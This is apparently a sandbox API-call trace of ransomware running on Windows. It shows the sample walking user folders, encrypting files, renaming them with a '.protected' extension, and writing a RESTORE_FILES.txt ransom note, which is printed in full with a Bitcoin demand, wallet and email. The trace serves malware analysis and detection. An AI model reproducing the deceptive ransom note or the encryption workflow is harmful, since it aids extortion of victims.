pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned 64 [0094.904] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0094.904] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0094.904] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned 66 [0094.904] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0094.904] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.904] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.904] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.904] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.904] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.904] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\.") returned 66 [0094.905] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.905] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.905] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.905] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.905] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.905] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.905] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.905] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\..") returned 67 [0094.905] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.905] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.905] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.905] lstrcmpiW (lpString1="Quick Launch", lpString2="Windows") returned -1 [0094.905] lstrcmpiW (lpString1="Quick Launch", lpString2="Program Files") returned 1 [0094.905] lstrcmpiW (lpString1="Quick Launch", lpString2="Program Files (x86)") returned 1 [0094.905] lstrcmpiW (lpString1="Quick Launch", lpString2="$Recycle.bin") returned 1 [0094.905] lstrcmpiW (lpString1="Quick Launch", lpString2="System Volume Information") returned -1 [0094.905] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned 77 [0094.905] lstrcmpW (lpString1="Quick Launch", lpString2=".") returned 1 [0094.905] lstrcmpW (lpString1="Quick Launch", lpString2="..") returned 1 [0094.905] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned 79 [0094.905] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0094.911] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.911] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.911] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.911] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.916] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.916] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\.") returned 79 [0094.916] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.916] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.916] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.916] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.916] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.916] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.916] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.916] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.916] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.916] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.916] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.916] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.916] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\..") returned 80 [0094.916] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.916] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.916] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.916] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.916] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.916] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.917] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.917] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0094.917] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0094.917] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0094.917] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0094.917] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0094.917] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 89 [0094.917] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0094.917] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0094.917] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.917] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.918] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 89 [0094.918] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0094.918] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 89 [0094.918] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0094.918] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 89 [0094.918] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0094.918] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x92, lpOverlapped=0x0) returned 1 [0094.919] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.919] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x92, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x92, lpOverlapped=0x0) returned 1 [0094.921] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.921] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.922] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.922] CloseHandle (hObject=0x150) returned 1 [0094.922] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.protected") returned 99 [0094.922] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.protected" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini.protected")) returned 1 [0094.923] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.923] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="Windows") returned -1 [0094.923] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="Program Files") returned 1 [0094.923] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="Program Files (x86)") returned 1 [0094.923] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="$Recycle.bin") returned 1 [0094.923] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="System Volume Information") returned -1 [0094.923] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 95 [0094.923] StrStrIW (lpFirst="Shows Desktop.lnk", lpSrch=".protected") returned 0x0 [0094.923] lstrcmpW (lpString1="Shows Desktop.lnk", lpString2="RESTORE_FILES.txt") returned 1 [0094.923] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.923] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.924] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 95 [0094.924] StrStrW (lpFirst="Shows Desktop.lnk", lpSrch=".txt") returned 0x0 [0094.924] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 95 [0094.924] StrStrW (lpFirst="Shows Desktop.lnk", lpSrch=".rar") returned 0x0 [0094.924] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 95 [0094.924] StrStrW (lpFirst="Shows Desktop.lnk", lpSrch=".zip") returned 0x0 [0094.924] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x122, lpOverlapped=0x0) returned 1 [0094.926] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffede, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.926] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x122, lpOverlapped=0x0) returned 1 [0094.926] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.926] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.926] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.926] CloseHandle (hObject=0x150) returned 1 [0094.926] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.protected") returned 105 [0094.926] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.protected" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk.protected")) returned 1 [0094.927] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.927] lstrcmpiW (lpString1="User Pinned", lpString2="Windows") returned -1 [0094.927] lstrcmpiW (lpString1="User Pinned", lpString2="Program Files") returned 1 [0094.927] lstrcmpiW (lpString1="User Pinned", lpString2="Program Files (x86)") returned 1 [0094.927] lstrcmpiW (lpString1="User Pinned", lpString2="$Recycle.bin") returned 1 [0094.927] lstrcmpiW (lpString1="User Pinned", lpString2="System Volume Information") returned 1 [0094.928] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned 89 [0094.928] lstrcmpW (lpString1="User Pinned", lpString2=".") returned 1 [0094.928] lstrcmpW (lpString1="User Pinned", lpString2="..") returned 1 [0094.928] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned 91 [0094.928] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0094.929] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.929] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.929] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.929] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.929] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.929] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\.") returned 91 [0094.929] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.929] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.929] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.929] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0094.929] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0094.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.929] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0094.929] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.929] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.929] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.929] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.929] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.929] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\..") returned 92 [0094.929] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.929] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.929] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.929] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.929] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0094.929] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0094.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.930] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0094.930] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="Windows") returned -1 [0094.930] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="Program Files") returned -1 [0094.930] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="Program Files (x86)") returned -1 [0094.930] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="$Recycle.bin") returned 1 [0094.930] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="System Volume Information") returned -1 [0094.930] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned 110 [0094.930] lstrcmpW (lpString1="ImplicitAppShortcuts", lpString2=".") returned 1 [0094.930] lstrcmpW (lpString1="ImplicitAppShortcuts", lpString2="..") returned 1 [0094.930] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned 112 [0094.930] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0094.930] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.930] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.930] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.930] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.930] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.930] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\.") returned 112 [0094.931] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.931] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.931] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.931] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.931] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.931] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.931] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.931] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\..") returned 113 [0094.931] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.931] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.931] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0094.931] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0094.931] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\RESTORE_FILES.txt") returned 128 [0094.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0094.932] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.932] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0094.933] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 